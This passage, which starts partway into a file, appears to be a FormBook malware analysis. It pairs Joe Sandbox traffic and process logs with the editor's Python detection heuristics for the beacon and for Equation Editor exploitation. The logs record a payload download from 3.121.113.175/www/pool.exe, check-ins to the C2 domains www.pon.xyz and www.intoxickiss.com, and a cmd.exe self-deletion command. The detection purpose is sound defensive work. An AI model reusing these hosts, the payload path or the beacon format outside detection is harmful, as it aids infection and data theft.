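from sessions 0 to 2 of the HTTP Packets table (bodies truncated); the
process lists and the URI heuristics are assumptions fitted to that traffic.
"""
import re
from urllib.parse import urlsplit

OFFICE_HELPER_PROCS = {"eqnedt32.exe"}   # assumption: Office helpers that never need HTTP
INJECTION_HOSTS = {"explorer.exe"}       # assumption: processes FormBook injects into
SHORT_DIR = re.compile(r"^/[A-Za-z0-9]{2,8}/$")        # beacon path such as /wufn/
B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")    # long base64 query value

SESSIONS = [
    {"id": 0, "process": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "host": "3.121.113.175", "method": "GET", "uri": "/www/pool.exe", "req_body": b"",
     "status": 200, "resp_headers": {"Content-Type": "application/x-msdownload"},
     "resp_body": bytes.fromhex("4d5a90000300000004000000ffff0000")},
    {"id": 1, "process": r"C:\Windows\explorer.exe", "host": "www.pon.xyz", "method": "GET",
     "uri": "/wufn/?6lPhQ=TjHmMFER1Cmk2H/fB4fy73K0u4EyZw5fKqkeqDjs9aj0G9oQA4BDCdhs/b9tHPs2qA0f+w==&yN94=f2JPQ0jxKXodUnz",
     "req_body": b"\x00" * 7, "status": 200,
     "resp_headers": {"Server": "openresty", "Content-Type": "text/html; charset=UTF-8"},
     "resp_body": b"<!DOCTYPE html><html data-adblockkey="},
    {"id": 2, "process": r"C:\Windows\explorer.exe", "host": "www.intoxickiss.com", "method": "GET",
     "uri": "/wufn/?yN94=f2JPQ0jxKXodUnz&6lPhQ=eFcjLRgZ/IJICcXgyTb3Jzj/ojOR5Bd5C6w81D5RMgQILdL/YJI1IJ8dE7ncgUBzQfOvsg==",
     "req_body": b"\x00" * 7, "status": 302,
     "resp_headers": {"server": "adobe", "location": "https://portfolio.adobe.com/missing"},
     "resp_body": b""},   # chunked body not reproduced from the report
]


def _hdr(headers, name):
    """Case-insensitive header lookup (servers above mix 'Server' and 'server')."""
    for k, v in headers.items():
        if k.lower() == name.lower():
            return v
    return None


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_pe_download(s):
    """Response body carries an MZ header or is declared as an executable."""
    ct = (_hdr(s["resp_headers"], "Content-Type") or "").lower()
    return s["resp_body"][:2] == b"MZ" or ct.startswith("application/x-msdownload")


def is_office_helper_http(s):
    return _basename(s["process"]) in OFFICE_HELPER_PROCS


def beacon_key(s):
    """Return (path, short token) if the request matches the FormBook GET beacon shape, else None."""
    if s["method"] != "GET" or _basename(s["process"]) not in INJECTION_HOSTS:
        return None
    parts = urlsplit(s["uri"])
    if not SHORT_DIR.match(parts.path):
        return None
    # Split by hand: parse_qs would turn '+' inside the base64 value into a space.
    params = [p.split("=", 1) for p in parts.query.split("&") if "=" in p]
    if len(params) != 2:
        return None
    blobs = [v for _, v in params if B64_BLOB.match(v)]
    tokens = [v for _, v in params if not B64_BLOB.match(v)]
    if len(blobs) != 1 or len(tokens) != 1:
        return None
    if s["req_body"].strip(b"\x00"):   # the GET beacon carries only a few NUL bytes
        return None
    return parts.path, tokens[0]


def triage(sessions):
    """Per-session rule hits plus the beacon domain walk: the same path and
    client token sent to two or more hosts."""
    findings, walk = [], {}
    for s in sessions:
        helper = is_office_helper_http(s)
        if helper:
            findings.append((s["id"], "office-helper-http"))
        if is_pe_download(s):
            findings.append((s["id"], "office-helper-pe-download" if helper else "pe-download"))
        key = beacon_key(s)
        if key:
            findings.append((s["id"], "formbook-like-beacon"))
            walk.setdefault(key, set()).add(s["host"])
    walks = {k: sorted(h) for k, h in walk.items() if len(h) >= 2}
    return {"findings": findings, "walks": walks}


if __name__ == "__main__":
    print(triage(SESSIONS))
```

The domain-walk key is deliberately the short token rather than the long blob: the blob changes per request, while the token stays the same across www.pon.xyz and www.intoxickiss.com above, which is what lets a single client's beacons be clustered across hosts without decrypting anything. Extending OFFICE_HELPER_PROCS or INJECTION_HOSTS to other binaries is a tuning decision for the environment, not something this traffic alone justifies.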


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49167 | 151.101.0.119 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 17:16:43.686728001 CEST | 760 | OUT | GET /wufn/?yN94=f2JPQ0jxKXodUnz&6lPhQ=eFcjLRgZ/IJICcXgyTb3Jzj/ojOR5Bd5C6w81D5RMgQILdL/YJI1IJ8dE7ncgUBzQfOvsg== HTTP/1.1
                                                                                                                                                  Host: www.intoxickiss.com
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii:
Jul 22, 2021 17:16:43.832999945 CEST | 761 | IN | HTTP/1.1 302 Found
                                                                                                                                                  server: adobe
                                                                                                                                                  cache-control: no-cache, no-store, private, must-revalidate, max-age=0, max-stale=0, post-check=0, pre-check=0
                                                                                                                                                  location: https://portfolio.adobe.com/missing
                                                                                                                                                  x-trace-id: nhEa/ME/ozF9cbxuUwEh+E96PhQ
                                                                                                                                                  x-app-name: Pro2-Renderer
                                                                                                                                                  x-xss-protection: 1; mode=block
                                                                                                                                                  x-content-type-options: nosniff
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Date: Thu, 22 Jul 2021 15:16:43 GMT
                                                                                                                                                  Via: 1.1 varnish
                                                                                                                                                  Connection: close
                                                                                                                                                  X-Served-By: cache-hhn4076-HHN
                                                                                                                                                  X-Cache: MISS
                                                                                                                                                  X-Cache-Hits: 0
                                                                                                                                                  X-Timer: S1626967004.724224,VS0,VE99
                                                                                                                                                  Vary: Fastly-SSL, X-Use-Renderer
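The check-in above, re-parsed as an added example (this is the editor's own code, not part of the Joe Sandbox report and not FormBook's code). The request and the response are reconstructed from the rows above; the indicator thresholds, the regular expressions and the four-hit cut-off are assumptions chosen to fit the observed request, not the sandbox's detection rules.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed from the request/response rows above (not a live capture).
# The seven 0x00 bytes are the "Data Raw" the report shows after the headers.
REQUEST = (
    "GET /wufn/?yN94=f2JPQ0jxKXodUnz&6lPhQ=eFcjLRgZ/IJICcXgyTb3Jzj/"
    "ojOR5Bd5C6w81D5RMgQILdL/YJI1IJ8dE7ncgUBzQfOvsg== HTTP/1.1\r\n"
    "Host: www.intoxickiss.com\r\n"
    "Connection: close\r\n"
    "\r\n" + "\x00" * 7
)
RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "server: adobe\r\n"
    "location: https://portfolio.adobe.com/missing\r\n"
    "Connection: close\r\n"
    "\r\n"
)


def parse_http(message):
    """Split one HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = message.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def beacon_indicators(request):
    """Heuristics for a FormBook-style check-in. The patterns and lengths are
    assumptions derived from the request above, not sandbox rules."""
    start, headers, body = parse_http(request)
    method, target, _version = start.split(" ", 2)
    url = urlsplit(target)
    params = parse_qsl(url.query, keep_blank_values=True)
    b64 = re.compile(r"[A-Za-z0-9+/]+={0,2}")
    return {
        # one short lowercase path segment, e.g. /wufn/
        "short_path": re.fullmatch(r"/[a-z0-9]{2,8}/", url.path) is not None,
        # exactly two parameters whose keys look random rather than descriptive
        "two_random_keys": len(params) == 2
        and all(re.fullmatch(r"[A-Za-z0-9]{3,6}", k) for k, _ in params),
        # at least one value is a long base64 blob (note the "==" padding)
        "b64_value": any(len(v) >= 32 and b64.fullmatch(v) is not None for _, v in params),
        # a GET that nevertheless carries a body, and the body is all NUL bytes
        "nul_body": method == "GET" and len(body) > 0 and set(body) == {"\x00"},
        # no User-Agent or Accept at all: just Host and Connection: close
        "bare_headers": set(headers) == {"host", "connection"}
        and headers["connection"].lower() == "close",
    }


def score(request):
    """Count matching indicators; four or more is treated as a beacon (assumed threshold)."""
    hits = sum(beacon_indicators(request).values())
    return hits, ("formbook-like beacon" if hits >= 4 else "inconclusive")


def classify_response(request, response):
    """Tell a reply from the contacted host apart from a redirect to some other site."""
    _, req_headers, _ = parse_http(request)
    status, headers, _ = parse_http(response)
    code = int(status.split()[1])
    redirect_host = urlsplit(headers.get("location", "")).hostname or ""
    if code in (301, 302, 307, 308) and redirect_host and redirect_host != req_headers.get("host"):
        return "offsite-redirect:" + redirect_host
    return "status:%d" % code


if __name__ == "__main__":
    print(beacon_indicators(REQUEST))
    print(score(REQUEST))
    print(classify_response(REQUEST, RESPONSE))
```

What the exchange tells an analyst: the client sent a FormBook-shaped GET (short path, two random keys, a base64 value, seven NUL bytes after the headers, no User-Agent) and the host answered with `server: adobe` and a 302 to `https://portfolio.adobe.com/missing`, which is a hosting provider's not-found page rather than an operator's reply. FormBook works through a list of configured domains, so a dead or parked one in a run is not unusual; the shape of the beacon, not this particular host, is the durable thing to alert on.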


                                                                                                                                                  Behavior

                                                                                                                                                  System Behavior

                                                                                                                                                  General

Start time: 17:14:41
Start date: 22/07/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13fcd0000
File size: 27641504 bytes
MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                  General

Start time: 17:15:03
Start date: 22/07/2021
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                  General

Start time: 17:15:04
Start date: 22/07/2021
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\Public\vbc.exe'
Imagebase: 0x270000
File size: 713216 bytes
MD5 hash: 734A568749C7879E5CA5EA2B8E082F5E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low

                                                                                                                                                  General

Start time: 17:15:25
Start date: 22/07/2021
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: C:\Users\Public\vbc.exe
Imagebase: 0x270000
File size: 713216 bytes
MD5 hash: 734A568749C7879E5CA5EA2B8E082F5E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

                                                                                                                                                  General

Start time: 17:15:27
Start date: 22/07/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0xffca0000
File size: 3229696 bytes
MD5 hash: 38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                  General

Start time: 17:15:53
Start date: 22/07/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\rundll32.exe
Imagebase: 0x20000
File size: 44544 bytes
MD5 hash: 51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high

                                                                                                                                                  General

Start time: 17:15:54
Start date: 22/07/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\Public\vbc.exe'
Imagebase: 0x4ab10000
File size: 302592 bytes
MD5 hash: AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
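The process list above, turned into four detection rules as an added example (the editor's own code, not the sandbox's rules and not part of the report). Start times, paths and command lines are copied from the rows above; the report does not show parent processes, so the parent column below is an assumption: EQNEDT32.EXE is started through DCOM, so its parent is taken to be svchost.exe rather than EXCEL.EXE, the first vbc.exe is taken to be EQNEDT32.EXE's child, rundll32.exe is taken to be explorer.exe's child and cmd.exe rundll32.exe's. The folder list is likewise an assumption.

```python
import re
from collections import namedtuple

Proc = namedtuple("Proc", "start path cmdline parent")

SVCHOST = r"C:\Windows\System32\svchost.exe"
EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
VBC = r"C:\Users\Public\vbc.exe"

# Constructed from the "System Behavior" rows above. The parent field is NOT in
# the report and is assumed (see the lead-in); cmd.exe's Commandline is kept as
# the report shows it, without the image path.
PROCS = [
    Proc("17:14:41", r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
         r"'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding", None),
    Proc("17:15:03", EQNEDT, "'" + EQNEDT + "' -Embedding", SVCHOST),
    Proc("17:15:04", VBC, "'" + VBC + "'", EQNEDT),
    Proc("17:15:25", VBC, VBC, VBC),
    Proc("17:15:27", r"C:\Windows\explorer.exe", r"C:\Windows\Explorer.EXE", None),
    Proc("17:15:53", r"C:\Windows\SysWOW64\rundll32.exe", r"C:\Windows\SysWOW64\rundll32.exe",
         r"C:\Windows\explorer.exe"),
    Proc("17:15:54", r"C:\Windows\SysWOW64\cmd.exe", "/c del '" + VBC + "'",
         r"C:\Windows\SysWOW64\rundll32.exe"),
]

# Folders any user can write to (assumed list); a binary running from one is a finding.
USER_WRITABLE = ("c:\\users\\public\\", "c:\\programdata\\",
                 "\\appdata\\local\\temp\\", "c:\\windows\\temp\\")


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def args_after_image(cmdline):
    """Whatever follows the (possibly quoted) image path; '' when a process such as
    rundll32.exe was started with no DLL and no export at all. Unquoted image paths
    containing spaces are not handled."""
    s = cmdline.strip()
    if s[:1] in ("'", '"'):
        end = s.find(s[0], 1)
        return s[end + 1:].strip() if end != -1 else ""
    return s.partition(" ")[2].strip()


def check(procs):
    """Run four rules over the list; returns (start, rule, evidence) tuples in time order."""
    known_images = {p.path.lower() for p in procs}
    findings = []
    for p in sorted(procs, key=lambda x: x.start):
        name = image_name(p.path)
        # 1. Equation Editor spawning anything: the CVE-2017-11882 / CVE-2018-0802 pattern.
        if p.parent and image_name(p.parent) == "eqnedt32.exe":
            findings.append((p.start, "eqnedt32-child", p.path))
        # 2. Execution from a user-writable folder (the dropper lands in C:\Users\Public).
        if any(marker in p.path.lower() for marker in USER_WRITABLE):
            findings.append((p.start, "exec-from-user-writable", p.path))
        # 3. rundll32.exe with no arguments: nothing legitimate to load, so it is a host for injected code.
        if name == "rundll32.exe" and args_after_image(p.cmdline) == "":
            findings.append((p.start, "rundll32-no-args", p.cmdline))
        # 4. cmd.exe deleting the image of another process in the same set (self-cleanup).
        if name == "cmd.exe":
            m = re.search(r"""(?i)\bdel\b\s+['"]?([^'"]+?)['"]?\s*$""", p.cmdline)
            if m and m.group(1).lower() in known_images:
                findings.append((p.start, "deletes-tracked-image", m.group(1)))
    return findings


if __name__ == "__main__":
    for start, rule, evidence in check(PROCS):
        print(start, rule, evidence)
```

Two things in the rows above are worth keeping in mind when tuning such rules. First, the two vbc.exe rows carry the same MD5 on disk, yet the second instance is classified as native C/C++ code and holds the FormBook Yara hits at 0x400000 while the first is .NET: the in-memory image of the child no longer matches the file on disk, so a hash-only rule sees a benign-looking .NET file and misses the payload. Second, because Equation Editor is COM-launched, a rule that demands EXCEL.EXE as the parent of EQNEDT32.EXE will not fire; rule 1 keys on EQNEDT32.EXE being the parent instead.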
